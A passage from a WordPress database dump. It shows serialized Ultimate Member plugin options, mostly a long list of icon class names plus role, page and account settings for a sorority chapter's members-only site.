cial-dribbble\";i:632;s:31:\"um-icon-social-dribbble-outline\";i:633;s:22:\"um-icon-social-dropbox\";i:634;s:30:\"um-icon-social-dropbox-outline\";i:635;s:19:\"um-icon-social-euro\";i:636;s:27:\"um-icon-social-euro-outline\";i:637;s:23:\"um-icon-social-facebook\";i:638;s:31:\"um-icon-social-facebook-outline\";i:639;s:25:\"um-icon-social-foursquare\";i:640;s:33:\"um-icon-social-foursquare-outline\";i:641;s:28:\"um-icon-social-freebsd-devil\";i:642;s:21:\"um-icon-social-github\";i:643;s:29:\"um-icon-social-github-outline\";i:644;s:21:\"um-icon-social-google\";i:645;s:29:\"um-icon-social-google-outline\";i:646;s:25:\"um-icon-social-googleplus\";i:647;s:33:\"um-icon-social-googleplus-outline\";i:648;s:25:\"um-icon-social-hackernews\";i:649;s:33:\"um-icon-social-hackernews-outline\";i:650;s:20:\"um-icon-social-html5\";i:651;s:28:\"um-icon-social-html5-outline\";i:652;s:24:\"um-icon-social-instagram\";i:653;s:32:\"um-icon-social-instagram-outline\";i:654;s:25:\"um-icon-social-javascript\";i:655;s:33:\"um-icon-social-javascript-outline\";i:656;s:23:\"um-icon-social-linkedin\";i:657;s:31:\"um-icon-social-linkedin-outline\";i:658;s:23:\"um-icon-social-markdown\";i:659;s:21:\"um-icon-social-nodejs\";i:660;s:22:\"um-icon-social-octocat\";i:661;s:24:\"um-icon-social-pinterest\";i:662;s:32:\"um-icon-social-pinterest-outline\";i:663;s:21:\"um-icon-social-python\";i:664;s:21:\"um-icon-social-reddit\";i:665;s:29:\"um-icon-social-reddit-outline\";i:666;s:18:\"um-icon-social-rss\";i:667;s:26:\"um-icon-social-rss-outline\";i:668;s:19:\"um-icon-social-sass\";i:669;s:20:\"um-icon-social-skype\";i:670;s:28:\"um-icon-social-skype-outline\";i:671;s:23:\"um-icon-social-snapchat\";i:672;s:31:\"um-icon-social-snapchat-outline\";i:673;s:21:\"um-icon-social-tumblr\";i:674;s:29:\"um-icon-social-tumblr-outline\";i:675;s:18:\"um-icon-social-tux\";i:676;s:21:\"um-icon-social-twitch\";i:677;s:29:\"um-icon-social-twitch-outline\";i:678;s:22:\"um-icon-social-twitter\";i:679;s:30:\"um-icon-social-twitter-outline\";i:680;s:18:\"um-icon-social-usd\";i:681;s:26:\"um-icon-social-usd-outline\";i:682;s:20:\"um-icon-social-vimeo\";i:683;s:28:\"um-icon-social-vimeo-outline\";i:684;s:23:\"um-icon-social-whatsapp\";i:685;s:31:\"um-icon-social-whatsapp-outline\";i:686;s:22:\"um-icon-social-windows\";i:687;s:30:\"um-icon-social-windows-outline\";i:688;s:24:\"um-icon-social-wordpress\";i:689;s:32:\"um-icon-social-wordpress-outline\";i:690;s:20:\"um-icon-social-yahoo\";i:691;s:28:\"um-icon-social-yahoo-outline\";i:692;s:18:\"um-icon-social-yen\";i:693;s:26:\"um-icon-social-yen-outline\";i:694;s:22:\"um-icon-social-youtube\";i:695;s:30:\"um-icon-social-youtube-outline\";i:696;s:16:\"um-icon-soup-can\";i:697;s:24:\"um-icon-soup-can-outline\";i:698;s:20:\"um-icon-speakerphone\";i:699;s:19:\"um-icon-speedometer\";i:700;s:13:\"um-icon-spoon\";i:701;s:12:\"um-icon-star\";i:702;s:18:\"um-icon-stats-bars\";i:703;s:13:\"um-icon-steam\";i:704;s:12:\"um-icon-stop\";i:705;s:19:\"um-icon-thermometer\";i:706;s:18:\"um-icon-thumbsdown\";i:707;s:16:\"um-icon-thumbsup\";i:708;s:14:\"um-icon-toggle\";i:709;s:21:\"um-icon-toggle-filled\";i:710;s:19:\"um-icon-transgender\";i:711;s:15:\"um-icon-trash-a\";i:712;s:15:\"um-icon-trash-b\";i:713;s:14:\"um-icon-trophy\";i:714;s:14:\"um-icon-tshirt\";i:715;s:22:\"um-icon-tshirt-outline\";i:716;s:16:\"um-icon-umbrella\";i:717;s:18:\"um-icon-university\";i:718;s:16:\"um-icon-unlocked\";i:719;s:14:\"um-icon-upload\";i:720;s:11:\"um-icon-usb\";i:721;s:19:\"um-icon-videocamera\";i:722;s:19:\"um-icon-volume-high\";i:723;s:18:\"um-icon-volume-low\";i:724;s:21:\"um-icon-volume-medium\";i:725;s:19:\"um-icon-volume-mute\";i:726;s:12:\"um-icon-wand\";i:727;s:17:\"um-icon-waterdrop\";i:728;s:12:\"um-icon-wifi\";i:729;s:17:\"um-icon-wineglass\";i:730;s:13:\"um-icon-woman\";i:731;s:14:\"um-icon-wrench\";i:732;s:12:\"um-icon-xbox\";i:733;s:15:\"um-faicon-glass\";i:734;s:15:\"um-faicon-music\";i:735;s:16:\"um-faicon-search\";i:736;s:20:\"um-faicon-envelope-o\";i:737;s:15:\"um-faicon-heart\";i:738;s:14:\"um-faicon-star\";i:739;s:16:\"um-faicon-star-o\";i:740;s:14:\"um-faicon-user\";i:741;s:14:\"um-faicon-film\";i:742;s:18:\"um-faicon-th-large\";i:743;s:12:\"um-faicon-th\";i:744;s:17:\"um-faicon-th-list\";i:745;s:15:\"um-faicon-check\";i:746;s:15:\"um-faicon-times\";i:747;s:21:\"um-faicon-search-plus\";i:748;s:22:\"um-faicon-search-minus\";i:749;s:19:\"um-faicon-power-off\";i:750;s:16:\"um-faicon-signal\";i:751;s:13:\"um-faicon-cog\";i:752;s:17:\"um-faicon-trash-o\";i:753;s:14:\"um-faicon-home\";i:754;s:16:\"um-faicon-file-o\";i:755;s:17:\"um-faicon-clock-o\";i:756;s:14:\"um-faicon-road\";i:757;s:18:\"um-faicon-download\";i:758;s:29:\"um-faicon-arrow-circle-o-down\";i:759;s:27:\"um-faicon-arrow-circle-o-up\";i:760;s:15:\"um-faicon-inbox\";i:761;s:23:\"um-faicon-play-circle-o\";i:762;s:16:\"um-faicon-repeat\";i:763;s:17:\"um-faicon-refresh\";i:764;s:18:\"um-faicon-list-alt\";i:765;s:14:\"um-faicon-lock\";i:766;s:14:\"um-faicon-flag\";i:767;s:20:\"um-faicon-headphones\";i:768;s:20:\"um-faicon-volume-off\";i:769;s:21:\"um-faicon-volume-down\";i:770;s:19:\"um-faicon-volume-up\";i:771;s:16:\"um-faicon-qrcode\";i:772;s:17:\"um-faicon-barcode\";i:773;s:13:\"um-faicon-tag\";i:774;s:14:\"um-faicon-tags\";i:775;s:14:\"um-faicon-book\";i:776;s:18:\"um-faicon-bookmark\";i:777;s:15:\"um-faicon-print\";i:778;s:16:\"um-faicon-camera\";i:779;s:14:\"um-faicon-font\";i:780;s:14:\"um-faicon-bold\";i:781;s:16:\"um-faicon-italic\";i:782;s:21:\"um-faicon-text-height\";i:783;s:20:\"um-faicon-text-width\";i:784;s:20:\"um-faicon-align-left\";i:785;s:22:\"um-faicon-align-center\";i:786;s:21:\"um-faicon-align-right\";i:787;s:23:\"um-faicon-align-justify\";i:788;s:14:\"um-faicon-list\";i:789;s:17:\"um-faicon-outdent\";i:790;s:16:\"um-faicon-indent\";i:791;s:22:\"um-faicon-video-camera\";i:792;s:19:\"um-faicon-picture-o\";i:793;s:16:\"um-faicon-pencil\";i:794;s:20:\"um-faicon-map-marker\";i:795;s:16:\"um-faicon-adjust\";i:796;s:14:\"um-faicon-tint\";i:797;s:25:\"um-faicon-pencil-square-o\";i:798;s:24:\"um-faicon-share-square-o\";i:799;s:24:\"um-faicon-check-square-o\";i:800;s:16:\"um-faicon-arrows\";i:801;s:23:\"um-faicon-step-backward\";i:802;s:23:\"um-faicon-fast-backward\";i:803;s:18:\"um-faicon-backward\";i:804;s:14:\"um-faicon-play\";i:805;s:15:\"um-faicon-pause\";i:806;s:14:\"um-faicon-stop\";i:807;s:17:\"um-faicon-forward\";i:808;s:22:\"um-faicon-fast-forward\";i:809;s:22:\"um-faicon-step-forward\";i:810;s:15:\"um-faicon-eject\";i:811;s:22:\"um-faicon-chevron-left\";i:812;s:23:\"um-faicon-chevron-right\";i:813;s:21:\"um-faicon-plus-circle\";i:814;s:22:\"um-faicon-minus-circle\";i:815;s:22:\"um-faicon-times-circle\";i:816;s:22:\"um-faicon-check-circle\";i:817;s:25:\"um-faicon-question-circle\";i:818;s:21:\"um-faicon-info-circle\";i:819;s:20:\"um-faicon-crosshairs\";i:820;s:24:\"um-faicon-times-circle-o\";i:821;s:24:\"um-faicon-check-circle-o\";i:822;s:13:\"um-faicon-ban\";i:823;s:20:\"um-faicon-arrow-left\";i:824;s:21:\"um-faicon-arrow-right\";i:825;s:18:\"um-faicon-arrow-up\";i:826;s:20:\"um-faicon-arrow-down\";i:827;s:15:\"um-faicon-share\";i:828;s:16:\"um-faicon-expand\";i:829;s:18:\"um-faicon-compress\";i:830;s:14:\"um-faicon-plus\";i:831;s:15:\"um-faicon-minus\";i:832;s:18:\"um-faicon-asterisk\";i:833;s:28:\"um-faicon-exclamation-circle\";i:834;s:14:\"um-faicon-gift\";i:835;s:14:\"um-faicon-leaf\";i:836;s:14:\"um-faicon-fire\";i:837;s:13:\"um-faicon-eye\";i:838;s:19:\"um-faicon-eye-slash\";i:839;s:30:\"um-faicon-exclamation-triangle\";i:840;s:15:\"um-faicon-plane\";i:841;s:18:\"um-faicon-calendar\";i:842;s:16:\"um-faicon-random\";i:843;s:17:\"um-faicon-comment\";i:844;s:16:\"um-faicon-magnet\";i:845;s:20:\"um-faicon-chevron-up\";i:846;s:22:\"um-faicon-chevron-down\";i:847;s:17:\"um-faicon-retweet\";i:848;s:23:\"um-faicon-shopping-cart\";i:849;s:16:\"um-faicon-folder\";i:850;s:21:\"um-faicon-folder-open\";i:851;s:18:\"um-faicon-arrows-v\";i:852;s:18:\"um-faicon-arrows-h\";i:853;s:19:\"um-faicon-bar-chart\";i:854;s:24:\"um-faicon-twitter-square\";i:855;s:25:\"um-faicon-facebook-square\";i:856;s:22:\"um-faicon-camera-retro\";i:857;s:13:\"um-faicon-key\";i:858;s:14:\"um-faicon-cogs\";i:859;s:18:\"um-faicon-comments\";i:860;s:21:\"um-faicon-thumbs-o-up\";i:861;s:23:\"um-faicon-thumbs-o-down\";i:862;s:19:\"um-faicon-star-half\";i:863;s:17:\"um-faicon-heart-o\";i:864;s:18:\"um-faicon-sign-out\";i:865;s:25:\"um-faicon-linkedin-square\";i:866;s:20:\"um-faicon-thumb-tack\";i:867;s:23:\"um-faicon-external-link\";i:868;s:17:\"um-faicon-sign-in\";i:869;s:16:\"um-faicon-trophy\";i:870;s:23:\"um-faicon-github-square\";i:871;s:16:\"um-faicon-upload\";i:872;s:17:\"um-faicon-lemon-o\";i:873;s:15:\"um-faicon-phone\";i:874;s:18:\"um-faicon-square-o\";i:875;s:20:\"um-faicon-bookmark-o\";i:876;s:22:\"um-faicon-phone-square\";i:877;s:17:\"um-faicon-twitter\";i:878;s:18:\"um-faicon-facebook\";i:879;s:16:\"um-faicon-github\";i:880;s:16:\"um-faicon-unlock\";i:881;s:21:\"um-faicon-credit-card\";i:882;s:13:\"um-faicon-rss\";i:883;s:15:\"um-faicon-hdd-o\";i:884;s:18:\"um-faicon-bullhorn\";i:885;s:14:\"um-faicon-bell\";i:886;s:21:\"um-faicon-certificate\";i:887;s:22:\"um-faicon-hand-o-right\";i:888;s:21:\"um-faicon-hand-o-left\";i:889;s:19:\"um-faicon-hand-o-up\";i:890;s:21:\"um-faicon-hand-o-down\";i:891;s:27:\"um-faicon-arrow-circle-left\";i:892;s:28:\"um-faicon-arrow-circle-right\";i:893;s:25:\"um-faicon-arrow-circle-up\";i:894;s:27:\"um-faicon-arrow-circle-down\";i:895;s:15:\"um-faicon-globe\";i:896;s:16:\"um-faicon-wrench\";i:897;s:15:\"um-faicon-tasks\";i:898;s:16:\"um-faicon-filter\";i:899;s:19:\"um-faicon-briefcase\";i:900;s:20:\"um-faicon-arrows-alt\";i:901;s:15:\"um-faicon-users\";i:902;s:14:\"um-faicon-link\";i:903;s:15:\"um-faicon-cloud\";i:904;s:15:\"um-faicon-flask\";i:905;s:18:\"um-faicon-scissors\";i:906;s:17:\"um-faicon-files-o\";i:907;s:19:\"um-faicon-paperclip\";i:908;s:18:\"um-faicon-floppy-o\";i:909;s:16:\"um-faicon-square\";i:910;s:14:\"um-faicon-bars\";i:911;s:17:\"um-faicon-list-ul\";i:912;s:17:\"um-faicon-list-ol\";i:913;s:23:\"um-faicon-strikethrough\";i:914;s:19:\"um-faicon-underline\";i:915;s:15:\"um-faicon-table\";i:916;s:15:\"um-faicon-magic\";i:917;s:15:\"um-faicon-truck\";i:918;s:19:\"um-faicon-pinterest\";i:919;s:26:\"um-faicon-pinterest-square\";i:920;s:28:\"um-faicon-google-plus-square\";i:921;s:21:\"um-faicon-google-plus\";i:922;s:15:\"um-faicon-money\";i:923;s:20:\"um-faicon-caret-down\";i:924;s:18:\"um-faicon-caret-up\";i:925;s:20:\"um-faicon-caret-left\";i:926;s:21:\"um-faicon-caret-right\";i:927;s:17:\"um-faicon-columns\";i:928;s:14:\"um-faicon-sort\";i:929;s:19:\"um-faicon-sort-desc\";i:930;s:18:\"um-faicon-sort-asc\";i:931;s:18:\"um-faicon-envelope\";i:932;s:18:\"um-faicon-linkedin\";i:933;s:14:\"um-faicon-undo\";i:934;s:15:\"um-faicon-gavel\";i:935;s:20:\"um-faicon-tachometer\";i:936;s:19:\"um-faicon-comment-o\";i:937;s:20:\"um-faicon-comments-o\";i:938;s:14:\"um-faicon-bolt\";i:939;s:17:\"um-faicon-sitemap\";i:940;s:18:\"um-faicon-umbrella\";i:941;s:19:\"um-faicon-clipboard\";i:942;s:21:\"um-faicon-lightbulb-o\";i:943;s:18:\"um-faicon-exchange\";i:944;s:24:\"um-faicon-cloud-download\";i:945;s:22:\"um-faicon-cloud-upload\";i:946;s:17:\"um-faicon-user-md\";i:947;s:21:\"um-faicon-stethoscope\";i:948;s:18:\"um-faicon-suitcase\";i:949;s:16:\"um-faicon-bell-o\";i:950;s:16:\"um-faicon-coffee\";i:951;s:17:\"um-faicon-cutlery\";i:952;s:21:\"um-faicon-file-text-o\";i:953;s:20:\"um-faicon-building-o\";i:954;s:20:\"um-faicon-hospital-o\";i:955;s:19:\"um-faicon-ambulance\";i:956;s:16:\"um-faicon-medkit\";i:957;s:21:\"um-faicon-fighter-jet\";i:958;s:14:\"um-faicon-beer\";i:959;s:18:\"um-faicon-h-square\";i:960;s:21:\"um-faicon-plus-square\";i:961;s:27:\"um-faicon-angle-double-left\";i:962;s:28:\"um-faicon-angle-double-right\";i:963;s:25:\"um-faicon-angle-double-up\";i:964;s:27:\"um-faicon-angle-double-down\";i:965;s:20:\"um-faicon-angle-left\";i:966;s:21:\"um-faicon-angle-right\";i:967;s:18:\"um-faicon-angle-up\";i:968;s:20:\"um-faicon-angle-down\";i:969;s:17:\"um-faicon-desktop\";i:970;s:16:\"um-faicon-laptop\";i:971;s:16:\"um-faicon-tablet\";i:972;s:16:\"um-faicon-mobile\";i:973;s:18:\"um-faicon-circle-o\";i:974;s:20:\"um-faicon-quote-left\";i:975;s:21:\"um-faicon-quote-right\";i:976;s:17:\"um-faicon-spinner\";i:977;s:14:\"um-faicon-spin\";i:978;s:16:\"um-faicon-circle\";i:979;s:15:\"um-faicon-reply\";i:980;s:20:\"um-faicon-github-alt\";i:981;s:18:\"um-faicon-folder-o\";i:982;s:23:\"um-faicon-folder-open-o\";i:983;s:17:\"um-faicon-smile-o\";i:984;s:17:\"um-faicon-frown-o\";i:985;s:15:\"um-faicon-meh-o\";i:986;s:17:\"um-faicon-gamepad\";i:987;s:20:\"um-faicon-keyboard-o\";i:988;s:16:\"um-faicon-flag-o\";i:989;s:24:\"um-faicon-flag-checkered\";i:990;s:18:\"um-faicon-terminal\";i:991;s:14:\"um-faicon-code\";i:992;s:19:\"um-faicon-reply-all\";i:993;s:21:\"um-faicon-star-half-o\";i:994;s:24:\"um-faicon-location-arrow\";i:995;s:14:\"um-faicon-crop\";i:996;s:19:\"um-faicon-code-fork\";i:997;s:22:\"um-faicon-chain-broken\";i:998;s:18:\"um-faicon-question\";i:999;s:14:\"um-faicon-info\";i:1000;s:21:\"um-faicon-exclamation\";i:1001;s:21:\"um-faicon-superscript\";i:1002;s:19:\"um-faicon-subscript\";i:1003;s:16:\"um-faicon-eraser\";i:1004;s:22:\"um-faicon-puzzle-piece\";i:1005;s:20:\"um-faicon-microphone\";i:1006;s:26:\"um-faicon-microphone-slash\";i:1007;s:16:\"um-faicon-shield\";i:1008;s:20:\"um-faicon-calendar-o\";i:1009;s:27:\"um-faicon-fire-extinguisher\";i:1010;s:16:\"um-faicon-rocket\";i:1011;s:16:\"um-faicon-maxcdn\";i:1012;s:29:\"um-faicon-chevron-circle-left\";i:1013;s:30:\"um-faicon-chevron-circle-right\";i:1014;s:27:\"um-faicon-chevron-circle-up\";i:1015;s:29:\"um-faicon-chevron-circle-down\";i:1016;s:15:\"um-faicon-html5\";i:1017;s:14:\"um-faicon-css3\";i:1018;s:16:\"um-faicon-anchor\";i:1019;s:20:\"um-faicon-unlock-alt\";i:1020;s:18:\"um-faicon-bullseye\";i:1021;s:20:\"um-faicon-ellipsis-h\";i:1022;s:20:\"um-faicon-ellipsis-v\";i:1023;s:20:\"um-faicon-rss-square\";i:1024;s:21:\"um-faicon-play-circle\";i:1025;s:16:\"um-faicon-ticket\";i:1026;s:22:\"um-faicon-minus-square\";i:1027;s:24:\"um-faicon-minus-square-o\";i:1028;s:18:\"um-faicon-level-up\";i:1029;s:20:\"um-faicon-level-down\";i:1030;s:22:\"um-faicon-check-square\";i:1031;s:23:\"um-faicon-pencil-square\";i:1032;s:30:\"um-faicon-external-link-square\";i:1033;s:22:\"um-faicon-share-square\";i:1034;s:17:\"um-faicon-compass\";i:1035;s:29:\"um-faicon-caret-square-o-down\";i:1036;s:27:\"um-faicon-caret-square-o-up\";i:1037;s:30:\"um-faicon-caret-square-o-right\";i:1038;s:13:\"um-faicon-eur\";i:1039;s:13:\"um-faicon-gbp\";i:1040;s:13:\"um-faicon-usd\";i:1041;s:13:\"um-faicon-inr\";i:1042;s:13:\"um-faicon-jpy\";i:1043;s:13:\"um-faicon-rub\";i:1044;s:13:\"um-faicon-krw\";i:1045;s:13:\"um-faicon-btc\";i:1046;s:14:\"um-faicon-file\";i:1047;s:19:\"um-faicon-file-text\";i:1048;s:24:\"um-faicon-sort-alpha-asc\";i:1049;s:25:\"um-faicon-sort-alpha-desc\";i:1050;s:25:\"um-faicon-sort-amount-asc\";i:1051;s:26:\"um-faicon-sort-amount-desc\";i:1052;s:26:\"um-faicon-sort-numeric-asc\";i:1053;s:27:\"um-faicon-sort-numeric-desc\";i:1054;s:19:\"um-faicon-thumbs-up\";i:1055;s:21:\"um-faicon-thumbs-down\";i:1056;s:24:\"um-faicon-youtube-square\";i:1057;s:17:\"um-faicon-youtube\";i:1058;s:14:\"um-faicon-xing\";i:1059;s:21:\"um-faicon-xing-square\";i:1060;s:22:\"um-faicon-youtube-play\";i:1061;s:17:\"um-faicon-dropbox\";i:1062;s:24:\"um-faicon-stack-overflow\";i:1063;s:19:\"um-faicon-instagram\";i:1064;s:16:\"um-faicon-flickr\";i:1065;s:13:\"um-faicon-adn\";i:1066;s:19:\"um-faicon-bitbucket\";i:1067;s:26:\"um-faicon-bitbucket-square\";i:1068;s:16:\"um-faicon-tumblr\";i:1069;s:23:\"um-faicon-tumblr-square\";i:1070;s:25:\"um-faicon-long-arrow-down\";i:1071;s:23:\"um-faicon-long-arrow-up\";i:1072;s:25:\"um-faicon-long-arrow-left\";i:1073;s:26:\"um-faicon-long-arrow-right\";i:1074;s:15:\"um-faicon-apple\";i:1075;s:17:\"um-faicon-windows\";i:1076;s:17:\"um-faicon-android\";i:1077;s:15:\"um-faicon-linux\";i:1078;s:18:\"um-faicon-dribbble\";i:1079;s:15:\"um-faicon-skype\";i:1080;s:20:\"um-faicon-foursquare\";i:1081;s:16:\"um-faicon-trello\";i:1082;s:16:\"um-faicon-female\";i:1083;s:14:\"um-faicon-male\";i:1084;s:16:\"um-faicon-gittip\";i:1085;s:15:\"um-faicon-sun-o\";i:1086;s:16:\"um-faicon-moon-o\";i:1087;s:17:\"um-faicon-archive\";i:1088;s:13:\"um-faicon-bug\";i:1089;s:12:\"um-faicon-vk\";i:1090;s:15:\"um-faicon-weibo\";i:1091;s:16:\"um-faicon-renren\";i:1092;s:19:\"um-faicon-pagelines\";i:1093;s:24:\"um-faicon-stack-exchange\";i:1094;s:30:\"um-faicon-arrow-circle-o-right\";i:1095;s:29:\"um-faicon-arrow-circle-o-left\";i:1096;s:29:\"um-faicon-caret-square-o-left\";i:1097;s:22:\"um-faicon-dot-circle-o\";i:1098;s:20:\"um-faicon-wheelchair\";i:1099;s:22:\"um-faicon-vimeo-square\";i:1100;s:13:\"um-faicon-try\";i:1101;s:23:\"um-faicon-plus-square-o\";i:1102;s:23:\"um-faicon-space-shuttle\";i:1103;s:15:\"um-faicon-slack\";i:1104;s:25:\"um-faicon-envelope-square\";i:1105;s:19:\"um-faicon-wordpress\";i:1106;s:16:\"um-faicon-openid\";i:1107;s:20:\"um-faicon-university\";i:1108;s:24:\"um-faicon-graduation-cap\";i:1109;s:15:\"um-faicon-yahoo\";i:1110;s:16:\"um-faicon-google\";i:1111;s:16:\"um-faicon-reddit\";i:1112;s:23:\"um-faicon-reddit-square\";i:1113;s:28:\"um-faicon-stumbleupon-circle\";i:1114;s:21:\"um-faicon-stumbleupon\";i:1115;s:19:\"um-faicon-delicious\";i:1116;s:14:\"um-faicon-digg\";i:1117;s:20:\"um-faicon-pied-piper\";i:1118;s:24:\"um-faicon-pied-piper-alt\";i:1119;s:16:\"um-faicon-drupal\";i:1120;s:16:\"um-faicon-joomla\";i:1121;s:18:\"um-faicon-language\";i:1122;s:13:\"um-faicon-fax\";i:1123;s:18:\"um-faicon-building\";i:1124;s:15:\"um-faicon-child\";i:1125;s:13:\"um-faicon-paw\";i:1126;s:15:\"um-faicon-spoon\";i:1127;s:14:\"um-faicon-cube\";i:1128;s:15:\"um-faicon-cubes\";i:1129;s:17:\"um-faicon-behance\";i:1130;s:24:\"um-faicon-behance-square\";i:1131;s:15:\"um-faicon-steam\";i:1132;s:22:\"um-faicon-steam-square\";i:1133;s:17:\"um-faicon-recycle\";i:1134;s:13:\"um-faicon-car\";i:1135;s:14:\"um-faicon-taxi\";i:1136;s:14:\"um-faicon-tree\";i:1137;s:17:\"um-faicon-spotify\";i:1138;s:20:\"um-faicon-deviantart\";i:1139;s:20:\"um-faicon-soundcloud\";i:1140;s:18:\"um-faicon-database\";i:1141;s:20:\"um-faicon-file-pdf-o\";i:1142;s:21:\"um-faicon-file-word-o\";i:1143;s:22:\"um-faicon-file-excel-o\";i:1144;s:27:\"um-faicon-file-powerpoint-o\";i:1145;s:22:\"um-faicon-file-image-o\";i:1146;s:24:\"um-faicon-file-archive-o\";i:1147;s:22:\"um-faicon-file-audio-o\";i:1148;s:22:\"um-faicon-file-video-o\";i:1149;s:21:\"um-faicon-file-code-o\";i:1150;s:14:\"um-faicon-vine\";i:1151;s:17:\"um-faicon-codepen\";i:1152;s:18:\"um-faicon-jsfiddle\";i:1153;s:19:\"um-faicon-life-ring\";i:1154;s:24:\"um-faicon-circle-o-notch\";i:1155;s:15:\"um-faicon-rebel\";i:1156;s:16:\"um-faicon-empire\";i:1157;s:20:\"um-faicon-git-square\";i:1158;s:13:\"um-faicon-git\";i:1159;s:21:\"um-faicon-hacker-news\";i:1160;s:23:\"um-faicon-tencent-weibo\";i:1161;s:12:\"um-faicon-qq\";i:1162;s:16:\"um-faicon-weixin\";i:1163;s:21:\"um-faicon-paper-plane\";i:1164;s:23:\"um-faicon-paper-plane-o\";i:1165;s:17:\"um-faicon-history\";i:1166;s:21:\"um-faicon-circle-thin\";i:1167;s:16:\"um-faicon-header\";i:1168;s:19:\"um-faicon-paragraph\";i:1169;s:17:\"um-faicon-sliders\";i:1170;s:19:\"um-faicon-share-alt\";i:1171;s:26:\"um-faicon-share-alt-square\";i:1172;s:14:\"um-faicon-bomb\";i:1173;s:18:\"um-faicon-futbol-o\";i:1174;s:13:\"um-faicon-tty\";i:1175;s:20:\"um-faicon-binoculars\";i:1176;s:14:\"um-faicon-plug\";i:1177;s:20:\"um-faicon-slideshare\";i:1178;s:16:\"um-faicon-twitch\";i:1179;s:14:\"um-faicon-yelp\";i:1180;s:21:\"um-faicon-newspaper-o\";i:1181;s:14:\"um-faicon-wifi\";i:1182;s:20:\"um-faicon-calculator\";i:1183;s:16:\"um-faicon-paypal\";i:1184;s:23:\"um-faicon-google-wallet\";i:1185;s:17:\"um-faicon-cc-visa\";i:1186;s:23:\"um-faicon-cc-mastercard\";i:1187;s:21:\"um-faicon-cc-discover\";i:1188;s:17:\"um-faicon-cc-amex\";i:1189;s:19:\"um-faicon-cc-paypal\";i:1190;s:19:\"um-faicon-cc-stripe\";i:1191;s:20:\"um-faicon-bell-slash\";i:1192;s:22:\"um-faicon-bell-slash-o\";i:1193;s:15:\"um-faicon-trash\";i:1194;s:19:\"um-faicon-copyright\";i:1195;s:12:\"um-faicon-at\";i:1196;s:20:\"um-faicon-eyedropper\";i:1197;s:21:\"um-faicon-paint-brush\";i:1198;s:23:\"um-faicon-birthday-cake\";i:1199;s:20:\"um-faicon-area-chart\";i:1200;s:19:\"um-faicon-pie-chart\";i:1201;s:20:\"um-faicon-line-chart\";i:1202;s:16:\"um-faicon-lastfm\";i:1203;s:23:\"um-faicon-lastfm-square\";i:1204;s:20:\"um-faicon-toggle-off\";i:1205;s:19:\"um-faicon-toggle-on\";i:1206;s:17:\"um-faicon-bicycle\";i:1207;s:13:\"um-faicon-bus\";i:1208;s:17:\"um-faicon-ioxhost\";i:1209;s:19:\"um-faicon-angellist\";i:1210;s:12:\"um-faicon-cc\";i:1211;s:13:\"um-faicon-ils\";i:1212;s:18:\"um-faicon-meanpath\";i:1213;s:14:\"um-faicon-spin\";i:1214;s:14:\"um-faicon-spin\";i:1215;s:14:\"um-faicon-spin\";i:1216;s:14:\"um-faicon-spin\";i:1217;s:14:\"um-faicon-spin\";}','yes'),(528,'widget_um_search_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(552,'um_cached_role_admin','a:31:{s:4:\"role\";s:5:\"admin\";s:4:\"core\";s:5:\"admin\";s:18:\"can_access_wpadmin\";s:1:\"1\";s:20:\"can_not_see_adminbar\";s:1:\"0\";s:17:\"can_edit_everyone\";s:1:\"1\";s:19:\"can_delete_everyone\";s:1:\"1\";s:16:\"can_edit_profile\";s:1:\"1\";s:18:\"can_delete_profile\";s:1:\"1\";s:12:\"can_view_all\";s:1:\"1\";s:24:\"can_make_private_profile\";s:1:\"1\";s:26:\"can_access_private_profile\";s:1:\"1\";s:16:\"default_homepage\";s:1:\"1\";s:6:\"status\";s:7:\"pending\";s:16:\"auto_approve_act\";s:16:\"redirect_profile\";s:11:\"after_login\";s:16:\"redirect_profile\";s:12:\"after_logout\";s:13:\"redirect_home\";s:11:\"synced_role\";s:13:\"administrator\";s:17:\"redirect_homepage\";s:0:\"\";s:16:\"auto_approve_url\";s:0:\"\";s:20:\"login_email_activate\";s:1:\"0\";s:16:\"checkmail_action\";s:12:\"show_message\";s:17:\"checkmail_message\";s:147:\"Thank you for registering. Before you can login we need you to activate your account by clicking the activation link in the email we just sent you.\";s:13:\"checkmail_url\";s:0:\"\";s:18:\"url_email_activate\";s:0:\"\";s:14:\"pending_action\";s:12:\"show_message\";s:15:\"pending_message\";s:107:\"Membership to our site is restricted to members of Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta chapter. \";s:11:\"pending_url\";s:0:\"\";s:18:\"login_redirect_url\";s:0:\"\";s:19:\"logout_redirect_url\";s:0:\"\";s:12:\"after_delete\";s:13:\"redirect_home\";s:19:\"delete_redirect_url\";s:0:\"\";}','yes'),(531,'__ultimatemember_sitekey','development.zphiblgz.org-WgRwEVNGWFd73YrXoein','yes'),(532,'um_is_installed','1','yes'),(533,'um_core_forms','a:3:{i:543;i:543;i:544;i:544;i:545;i:545;}','yes'),(534,'um_core_directories','a:1:{i:546;i:546;}','yes'),(535,'um_core_pages','a:7:{s:4:\"user\";s:3:\"553\";s:5:\"login\";s:3:\"553\";s:8:\"register\";s:3:\"551\";s:7:\"members\";s:3:\"606\";s:6:\"logout\";s:3:\"555\";s:7:\"account\";s:3:\"557\";s:14:\"password-reset\";s:3:\"559\";}','yes'),(536,'um_options','a:200:{s:8:\"last_tab\";s:0:\"\";s:9:\"core_user\";s:3:\"553\";s:12:\"core_account\";s:3:\"557\";s:12:\"core_members\";s:3:\"606\";s:13:\"core_register\";s:3:\"551\";s:10:\"core_login\";s:3:\"553\";s:11:\"core_logout\";s:3:\"555\";s:19:\"core_password-reset\";s:3:\"559\";s:12:\"default_role\";s:6:\"member\";s:14:\"permalink_base\";s:10:\"user_login\";s:12:\"display_name\";s:9:\"full_name\";s:18:\"display_name_field\";s:0:\"\";s:29:\"force_display_name_capitlized\";s:1:\"1\";s:15:\"author_redirect\";s:1:\"1\";s:12:\"members_page\";s:1:\"1\";s:13:\"use_gravatars\";s:1:\"0\";s:37:\"use_um_gravatar_default_builtin_image\";s:7:\"default\";s:29:\"use_um_gravatar_default_image\";s:1:\"0\";s:24:\"reset_require_strongpass\";s:1:\"0\";s:33:\"editable_primary_email_in_profile\";s:1:\"0\";s:20:\"account_tab_password\";s:1:\"1\";s:19:\"account_tab_privacy\";s:1:\"1\";s:25:\"account_tab_notifications\";s:1:\"1\";s:18:\"account_tab_delete\";s:1:\"1\";s:19:\"delete_account_text\";s:150:\"Are you sure you want to delete your account? This will erase all of your account data from the site. To delete your account enter your password 